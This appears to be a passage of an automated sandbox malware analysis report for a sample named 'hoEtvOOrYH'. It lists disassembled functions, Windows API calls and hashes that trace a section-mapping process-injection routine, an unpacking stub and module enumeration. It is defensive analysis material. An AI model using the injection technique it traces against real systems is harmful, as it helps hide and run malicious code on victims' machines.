                                                                                                                                                                                  • Source File: 00000000.00000002.1731953029.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_hoEtvOOrYH.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: Section$View$Create$DuplicateObject
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 1546783058-0
                                                                                                                                                                                  • Opcode ID: a471128e30253767d8ecbe7c8b9264cbc2fc79b6f64fc0f7368e35c36875084d
                                                                                                                                                                                  • Instruction ID: 6663a8c5485dafdc0fbfaf601e2c04d3b227d1cbd70bcfd861ccef21e9851678
                                                                                                                                                                                  • Opcode Fuzzy Hash: a471128e30253767d8ecbe7c8b9264cbc2fc79b6f64fc0f7368e35c36875084d
                                                                                                                                                                                  • Instruction Fuzzy Hash: 3D51FBB5900245BFEF208F91CC89FAF7BB8FF85710F104159FA11AA2A5D7749941CB64
                                                                                                                                                                                  Function 00401678 Relevance: 10.7, APIs: 7, Instructions: 158nativeCOMMON
                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                  • Executed
                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                  control_flow_graph 462 401678-40168c 463 401691-401696 462->463 464 40168e 462->464 466 4019b4-4019bc 463->466 467 40169c-4016ad 463->467 464->463 466->463 472 4019c1-401a03 call 4012c3 466->472 470 4019b2 467->470 471 4016b3-4016dc 467->471 470->472 471->470 479 4016e2-4016f9 NtDuplicateObject 471->479 479->470 481 4016ff-401723 NtCreateSection 479->481 483 401725-401746 NtMapViewOfSection 481->483 484 40177f-4017a5 NtCreateSection 481->484 483->484 486 401748-401764 NtMapViewOfSection 483->486 484->470 487 4017ab-4017af 484->487 486->484 489 401766-40177c 486->489 487->470 491 4017b5-4017d6 NtMapViewOfSection 487->491 489->484 491->470 493 4017dc-4017f8 NtMapViewOfSection 491->493 493->470 494 4017fe call 401803 493->494
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004016F1
                                                                                                                                                                                  • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 0040171E
                                                                                                                                                                                  • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401741
                                                                                                                                                                                  • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 0040175F
                                                                                                                                                                                  • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 004017A0
                                                                                                                                                                                  • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004017D1
                                                                                                                                                                                  • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004017F3
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000000.00000002.1731953029.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_hoEtvOOrYH.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: Section$View$Create$DuplicateObject
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 1546783058-0
                                                                                                                                                                                  • Opcode ID: 76003727399a2eca9fb632657c9a9f2aa461299f309746c84de5a453a1a51f96
                                                                                                                                                                                  • Instruction ID: 9d3a6761103bbc6b33e3c6c256166adc831e96f911efc5f9f86a17cfce9c5065
                                                                                                                                                                                  • Opcode Fuzzy Hash: 76003727399a2eca9fb632657c9a9f2aa461299f309746c84de5a453a1a51f96
                                                                                                                                                                                  • Instruction Fuzzy Hash: 6A5109B5900245BFEF208F91CC88FAB7BB8FF85B10F100159FA11AA2A5D7709945CB20
                                                                                                                                                                                  Function 0040310D Relevance: 3.2, APIs: 2, Instructions: 168nativethreadCOMMON
                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                  • Executed
                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                  control_flow_graph 499 40310d-403131 500 403250-403255 499->500 501 403137-40314f 499->501 501->500 502 403155-403166 501->502 503 403168-403171 502->503 504 403176-403184 503->504 504->504 505 403186-40318d 504->505 506 4031af-4031b6 505->506 507 40318f-4031ae 505->507 508 4031d8-4031db 506->508 509 4031b8-4031d7 506->509 507->506 510 4031e4 508->510 511 4031dd-4031e0 508->511 509->508 510->503 513 4031e6-4031eb 510->513 511->510 512 4031e2 511->512 512->513 513->500 514 4031ed-4031f0 513->514 514->500 515 4031f2-40324d RtlCreateUserThread NtTerminateProcess 514->515 515->500
                                                                                                                                                                                  APIs
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000000.00000002.1731953029.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_hoEtvOOrYH.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: CreateProcessTerminateThreadUser
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 1921587553-0
                                                                                                                                                                                  • Opcode ID: ba71293914487d9c4508611429cc1c96d45b5da92adc1af413e838efc5e3ffef
                                                                                                                                                                                  • Instruction ID: 2230f495bd44a537ec581f9501d496a478b2d408bf54a46c3e49a74e62ee8954
                                                                                                                                                                                  • Opcode Fuzzy Hash: ba71293914487d9c4508611429cc1c96d45b5da92adc1af413e838efc5e3ffef
                                                                                                                                                                                  • Instruction Fuzzy Hash: 14414732618E0C4FD768EE6CAC4966377D5E7A8311B1A43ABD809D7384EE30D95183C5
                                                                                                                                                                                  Function 008ADA84 Relevance: 3.0, APIs: 2, Instructions: 41processCOMMON
                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                  • Executed
                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                  control_flow_graph 516 8ada84-8ada9d 517 8ada9f-8adaa1 516->517 518 8adaa8-8adab4 CreateToolhelp32Snapshot 517->518 519 8adaa3 517->519 520 8adab6-8adabc 518->520 521 8adac4-8adad1 Module32First 518->521 519->518 520->521 528 8adabe-8adac2 520->528 522 8adada-8adae2 521->522 523 8adad3-8adad4 call 8ad743 521->523 526 8adad9 523->526 526->522 528->517 528->521
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 008ADAAC
                                                                                                                                                                                  • Module32First.KERNEL32(00000000,00000224), ref: 008ADACC
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000000.00000002.1732280470.00000000008AA000.00000040.00000020.00020000.00000000.sdmp, Offset: 008AA000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_8aa000_hoEtvOOrYH.jbxd
                                                                                                                                                                                  Yara matches
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: CreateFirstModule32SnapshotToolhelp32
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 3833638111-0
                                                                                                                                                                                  • Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                                                                                                                                                  • Instruction ID: a1292484055010d5b7ab9aacc09db4c6038b8ab20bbed41853b37e2ea73de290
                                                                                                                                                                                  • Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                                                                                                                                                  • Instruction Fuzzy Hash: F5F0C2316007216FE7203AF8988CB6A72E8FF4A321F100128E643D1CC0DAB0FC054661
                                                                                                                                                                                  Function 0088003C Relevance: 11.0, APIs: 4, Strings: 2, Instructions: 515memoryCOMMON
                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                  • Executed
                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                  control_flow_graph 69 88003c-880047 70 880049 69->70 71 88004c-880263 call 880a3f call 880e0f call 880d90 VirtualAlloc 69->71 70->71 86 88028b-880292 71->86 87 880265-880289 call 880a69 71->87 88 8802a1-8802b0 86->88 91 8802ce-8803c2 VirtualProtect call 880cce call 880ce7 87->91 88->91 92 8802b2-8802cc 88->92 98 8803d1-8803e0 91->98 92->88 99 880439-8804b8 VirtualFree 98->99 100 8803e2-880437 call 880ce7 98->100 101 8804be-8804cd 99->101 102 8805f4-8805fe 99->102 100->98 104 8804d3-8804dd 101->104 105 88077f-880789 102->105 106 880604-88060d 102->106 104->102 108 8804e3-880505 104->108 109 88078b-8807a3 105->109 110 8807a6-8807b0 105->110 106->105 111 880613-880637 106->111 120 880517-880520 108->120 121 880507-880515 108->121 109->110 113 88086e-8808be LoadLibraryA 110->113 114 8807b6-8807cb 110->114 115 88063e-880648 111->115 119 8808c7-8808f9 113->119 117 8807d2-8807d5 114->117 115->105 118 88064e-88065a 115->118 122 880824-880833 117->122 123 8807d7-8807e0 117->123 118->105 124 880660-88066a 118->124 125 8808fb-880901 119->125 126 880902-88091d 119->126 127 880526-880547 120->127 121->127 131 880839-88083c 122->131 128 8807e2 123->128 129 8807e4-880822 123->129 130 88067a-880689 124->130 125->126 132 88054d-880550 127->132 128->122 129->117 133 88068f-8806b2 130->133 134 880750-88077a 130->134 131->113 135 88083e-880847 131->135 137 8805e0-8805ef 132->137 138 880556-88056b 132->138 139 8806ef-8806fc 133->139 140 8806b4-8806ed 133->140 134->115 141 880849 135->141 142 88084b-88086c 135->142 137->104 143 88056d 138->143 144 88056f-88057a 138->144 145 88074b 139->145 146 8806fe-880748 139->146 140->139 141->113 142->131 143->137 149 88059b-8805bb 144->149 150 88057c-880599 144->150 145->130 146->145 153 8805bd-8805db 149->153 150->153 153->132
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 0088024D
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000000.00000002.1732204208.0000000000880000.00000040.00001000.00020000.00000000.sdmp, Offset: 00880000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_880000_hoEtvOOrYH.jbxd
                                                                                                                                                                                  Yara matches
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: AllocVirtual
                                                                                                                                                                                  • String ID: cess$kernel32.dll
                                                                                                                                                                                  • API String ID: 4275171209-1230238691
                                                                                                                                                                                  • Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                                                                                                                                                                  • Instruction ID: aac36b1d1735d88017c5ffbfa41392513043c77e30cf763340a148cb817e5263
                                                                                                                                                                                  • Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                                                                                                                                                                  • Instruction Fuzzy Hash: 3D527974A01229DFDBA4DF58C984BA8BBB1BF09304F1480D9E50DAB351DB30AE88DF15
                                                                                                                                                                                  Function 0041E020 Relevance: 4.6, APIs: 3, Instructions: 60librarymemoryloaderCOMMON
                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                  • Executed
                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                  control_flow_graph 498 41e020-41e15e GetModuleHandleW GetProcAddress VirtualProtect
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • GetModuleHandleW.KERNEL32(007FBE60), ref: 0041E0FC
                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,00428558), ref: 0041E139
                                                                                                                                                                                  • VirtualProtect.KERNELBASE(007FBCA4,007FBE5C,00000040,?), ref: 0041E159
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000000.00000002.1731971792.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00411000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_411000_hoEtvOOrYH.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: AddressHandleModuleProcProtectVirtual
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 2099061454-0
                                                                                                                                                                                  • Opcode ID: ed7f28cc16d09a46b10d0c784fb67efb52c54919e2bb855e4695998bb0004b58
                                                                                                                                                                                  • Instruction ID: bf942d14af1efede7f09638b6f18058680337e7b272a95013794b0dd03a82697
                                                                                                                                                                                  • Opcode Fuzzy Hash: ed7f28cc16d09a46b10d0c784fb67efb52c54919e2bb855e4695998bb0004b58
                                                                                                                                                                                  • Instruction Fuzzy Hash: BF3123106293C0EAE311DB38FC447663BA2AB69744F44946CD2848B3B2DBFE0556C72E
                                                                                                                                                                                  Function 00880E0F Relevance: 3.0, APIs: 2, Instructions: 15COMMON
                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                  • Executed
                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                  control_flow_graph 529 880e0f-880e24 SetErrorMode * 2 530 880e2b-880e2c 529->530 531 880e26 529->531 531->530
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • SetErrorMode.KERNELBASE(00000400,?,?,00880223,?,?), ref: 00880E19
                                                                                                                                                                                  • SetErrorMode.KERNELBASE(00000000,?,?,00880223,?,?), ref: 00880E1E
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000000.00000002.1732204208.0000000000880000.00000040.00001000.00020000.00000000.sdmp, Offset: 00880000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_880000_hoEtvOOrYH.jbxd
                                                                                                                                                                                  Yara matches
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: ErrorMode
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 2340568224-0
                                                                                                                                                                                  • Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                                                                                                                                                  • Instruction ID: f2f6d8dcacfc00e91535e2c3d4d44eba824c5639ec75f1ad12dbbdf9da4bc129
                                                                                                                                                                                  • Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                                                                                                                                                  • Instruction Fuzzy Hash: D6D0123114512877D7403A94DC09BCE7B1CDF05B62F008411FB0DD9080C770994047E5
                                                                                                                                                                                  Function 0041E160 Relevance: 1.5, APIs: 1, Instructions: 27libraryCOMMON
                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                  • Executed
                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                  control_flow_graph 532 41e160-41e1ee LoadLibraryW
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • LoadLibraryW.KERNELBASE(007FBE60,0041E686), ref: 0041E1E8
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000000.00000002.1731971792.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00411000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_411000_hoEtvOOrYH.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: LibraryLoad
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 1029625771-0
                                                                                                                                                                                  • Opcode ID: 6d238e4d275f321ba84a9d54ea67be493b39248c77fbf03331765bdaefa4b618
                                                                                                                                                                                  • Instruction ID: e3a8a89f9793f3a67f7cebaa72587345058e1a1b15750940b4a818443ddf913f
                                                                                                                                                                                  • Opcode Fuzzy Hash: 6d238e4d275f321ba84a9d54ea67be493b39248c77fbf03331765bdaefa4b618
                                                                                                                                                                                  • Instruction Fuzzy Hash: 7FF04804A38244CAE704DB74E9507A12363EFAC700F50A02A9319C77B1EBFE4915C71E
                                                                                                                                                                                  Function 00401A06 Relevance: 1.3, APIs: 1, Instructions: 60sleepCOMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • Sleep.KERNELBASE(00001388,0000005A), ref: 00401A56
                                                                                                                                                                                    • Part of subcall function 00401630: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004016F1
                                                                                                                                                                                    • Part of subcall function 00401630: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 0040171E
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000000.00000002.1731953029.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_hoEtvOOrYH.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: CreateDuplicateObjectSectionSleep
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 4152845823-0
                                                                                                                                                                                  • Opcode ID: cdcc311ceb2837f341ba908734da7b35adc779df5b271c6ec761724efb85a897
                                                                                                                                                                                  • Instruction ID: 9ebb0d5d2bcaaf4b8a6da6c44f2a62eb33f0d579d641f982b8f1711b028e46c7
                                                                                                                                                                                  • Opcode Fuzzy Hash: cdcc311ceb2837f341ba908734da7b35adc779df5b271c6ec761724efb85a897
                                                                                                                                                                                  • Instruction Fuzzy Hash: F501AD3170A204EBDB009A948D41EBB3218AB81354F3046B7B603791F1C67DA9136F6F
                                                                                                                                                                                  Function 00401A1C Relevance: 1.3, APIs: 1, Instructions: 54sleepCOMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • Sleep.KERNELBASE(00001388,0000005A), ref: 00401A56
                                                                                                                                                                                    • Part of subcall function 00401630: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004016F1
                                                                                                                                                                                    • Part of subcall function 00401630: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 0040171E
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000000.00000002.1731953029.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_hoEtvOOrYH.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: CreateDuplicateObjectSectionSleep
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 4152845823-0
                                                                                                                                                                                  • Opcode ID: 2f5f28e4999fdf4ae743695e3ae32fff629aee18e9753fdb2de2d595f75c34b4
                                                                                                                                                                                  • Instruction ID: 74bf1b2afaaea11ca0c0e56f9b1f986bf381a10b9881ca68c1150b9356aeb230
                                                                                                                                                                                  • Opcode Fuzzy Hash: 2f5f28e4999fdf4ae743695e3ae32fff629aee18e9753fdb2de2d595f75c34b4
                                                                                                                                                                                  • Instruction Fuzzy Hash: 96015E3170A104EBDB009A948D41FBA3214AB85354F3046B7B613791F1C67D9A137F6F
                                                                                                                                                                                  Function 00401A12 Relevance: 1.3, APIs: 1, Instructions: 53sleepCOMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • Sleep.KERNELBASE(00001388,0000005A), ref: 00401A56
                                                                                                                                                                                    • Part of subcall function 00401630: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004016F1
                                                                                                                                                                                    • Part of subcall function 00401630: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 0040171E
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000000.00000002.1731953029.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_hoEtvOOrYH.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: CreateDuplicateObjectSectionSleep
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 4152845823-0
                                                                                                                                                                                  • Opcode ID: ae05512fd5251021edca4d15e7d70a9b37d4d87fc1c0fe8ad5807b387d740cb1
                                                                                                                                                                                  • Instruction ID: d73ce5762afe86b3dc9ddffb89cb22f26ca3725698e0de0b5cdea12295139e68
                                                                                                                                                                                  • Opcode Fuzzy Hash: ae05512fd5251021edca4d15e7d70a9b37d4d87fc1c0fe8ad5807b387d740cb1
                                                                                                                                                                                  • Instruction Fuzzy Hash: 8C019E3170A204EBDB009A808D41FBA3224AB41350F3046B7B6077A1F1C63D9A136F5F
                                                                                                                                                                                  Function 00401A1F Relevance: 1.3, APIs: 1, Instructions: 51sleepCOMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • Sleep.KERNELBASE(00001388,0000005A), ref: 00401A56
                                                                                                                                                                                    • Part of subcall function 00401630: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004016F1
                                                                                                                                                                                    • Part of subcall function 00401630: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 0040171E
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000000.00000002.1731953029.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_hoEtvOOrYH.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: CreateDuplicateObjectSectionSleep
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 4152845823-0
                                                                                                                                                                                  • Opcode ID: 254eab8126462ec38dfc4a3a996a2ad5e8abce04bf8f94b9094cf8f2fa2f2c34
                                                                                                                                                                                  • Instruction ID: ab73073346a6364aa5533d6c8f5fbe814d7e64b70b61ce0f81f834eeff2a0555
                                                                                                                                                                                  • Opcode Fuzzy Hash: 254eab8126462ec38dfc4a3a996a2ad5e8abce04bf8f94b9094cf8f2fa2f2c34
                                                                                                                                                                                  • Instruction Fuzzy Hash: 3C017C31B0A205EBDB009AD08D81FBA3214AB45314F3086B7B613BA1F1C63D9A136F5F
                                                                                                                                                                                  Function 00401A22 Relevance: 1.3, APIs: 1, Instructions: 50sleepCOMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • Sleep.KERNELBASE(00001388,0000005A), ref: 00401A56
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000000.00000002.1731953029.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_hoEtvOOrYH.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: Sleep
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 3472027048-0
                                                                                                                                                                                  • Opcode ID: 6e961ae9266916f39a153e19b05d1beb86b796fb0aaf4f479fd1f87af5fb4436
                                                                                                                                                                                  • Instruction ID: 6485c0b3739817a7eba8982835a091150a70886c886236a9745aa1cef3f3b90f
                                                                                                                                                                                  • Opcode Fuzzy Hash: 6e961ae9266916f39a153e19b05d1beb86b796fb0aaf4f479fd1f87af5fb4436
                                                                                                                                                                                  • Instruction Fuzzy Hash: AC017C31B0A204EBDB009AD08D41FBA3215AB45314F2086B7B617791F1C63E9A136F5F
                                                                                                                                                                                  Function 00401A2F Relevance: 1.3, APIs: 1, Instructions: 50sleepCOMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • Sleep.KERNELBASE(00001388,0000005A), ref: 00401A56
                                                                                                                                                                                    • Part of subcall function 00401630: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004016F1
                                                                                                                                                                                    • Part of subcall function 00401630: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 0040171E
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000000.00000002.1731953029.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_hoEtvOOrYH.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: CreateDuplicateObjectSectionSleep
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 4152845823-0
                                                                                                                                                                                  • Opcode ID: fc7b232f7660c46c0be874543eb3d0c42f9b16e39d899871c612d7a074ae0c1c
                                                                                                                                                                                  • Instruction ID: 2bb26d72c1b977118a941110934db68769275302d48630a1afbcee3c678045b0
                                                                                                                                                                                  • Opcode Fuzzy Hash: fc7b232f7660c46c0be874543eb3d0c42f9b16e39d899871c612d7a074ae0c1c
                                                                                                                                                                                  • Instruction Fuzzy Hash: CE018F31B0A205EBDB009AD08D81FBA3214AB45315F3086B7BA13791F1C67D9A136F5F
                                                                                                                                                                                  Function 008AD743 Relevance: 1.3, APIs: 1, Instructions: 48memoryCOMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 008AD794
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000000.00000002.1732280470.00000000008AA000.00000040.00000020.00020000.00000000.sdmp, Offset: 008AA000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_8aa000_hoEtvOOrYH.jbxd
                                                                                                                                                                                  Yara matches
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: AllocVirtual
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 4275171209-0
                                                                                                                                                                                  • Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                                                                                                                                                  • Instruction ID: a016e991c95045e99b7df128f4c5e1853f5e82370b3e0be8c2f1fc8abb5379ac
                                                                                                                                                                                  • Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                                                                                                                                                  • Instruction Fuzzy Hash: 9A113C79A00208EFDB01DF98C985E98BBF5EF09751F058094F9499B362D771EA50DF81
                                                                                                                                                                                  Function 00401A33 Relevance: 1.3, APIs: 1, Instructions: 45sleepCOMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • Sleep.KERNELBASE(00001388,0000005A), ref: 00401A56
                                                                                                                                                                                    • Part of subcall function 00401630: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004016F1
                                                                                                                                                                                    • Part of subcall function 00401630: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 0040171E
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000000.00000002.1731953029.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_hoEtvOOrYH.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: CreateDuplicateObjectSectionSleep
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 4152845823-0
                                                                                                                                                                                  • Opcode ID: eff07d97131d67143dfcdb5282c54e7f4d9014b4e7bbc5dad2acaf1ab08b79e4
                                                                                                                                                                                  • Instruction ID: 7b59a2ed808b167059f1a43439f678e344e3511e3e2d5798feb9efe5e8b923c8
                                                                                                                                                                                  • Opcode Fuzzy Hash: eff07d97131d67143dfcdb5282c54e7f4d9014b4e7bbc5dad2acaf1ab08b79e4
                                                                                                                                                                                  • Instruction Fuzzy Hash: 49F06D35709145EBDB009AD08D41ABB3215AB44325F208677B612791E1C63D9A136F1F
                                                                                                                                                                                  Function 00401A44 Relevance: 1.3, APIs: 1, Instructions: 41sleepCOMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • Sleep.KERNELBASE(00001388,0000005A), ref: 00401A56
                                                                                                                                                                                    • Part of subcall function 00401630: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004016F1
                                                                                                                                                                                    • Part of subcall function 00401630: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 0040171E
                                                                                                                                                                                  Memory Dump Source
